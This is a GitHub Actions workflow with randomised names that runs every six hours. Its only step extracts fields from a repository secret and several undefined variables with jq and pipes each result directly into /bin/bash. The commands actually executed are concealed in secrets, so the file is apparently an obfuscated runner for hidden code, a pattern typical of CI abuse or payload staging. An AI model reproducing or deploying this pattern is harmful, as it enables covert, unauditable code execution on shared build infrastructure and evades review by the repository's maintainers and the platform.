name: ashonhyt

on:
  workflow_dispatch:
  schedule:
    - cron: '19 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ashonhyt
        env:
          oqi09: ${{ secrets.oqi09 }}
        run: |
          echo $oqi09 | jq -r .te384 | /bin/bash
          echo $ly82 | jq -r .d84509 | /bin/bash
          echo $s05727 | jq -r .i8 | /bin/bash
          echo $em376 | jq -r .o46 | /bin/bash
          echo $tz93746 | jq -r .c77 | /bin/bash
          echo $zn66 | jq -r .uzwct4 | /bin/bash

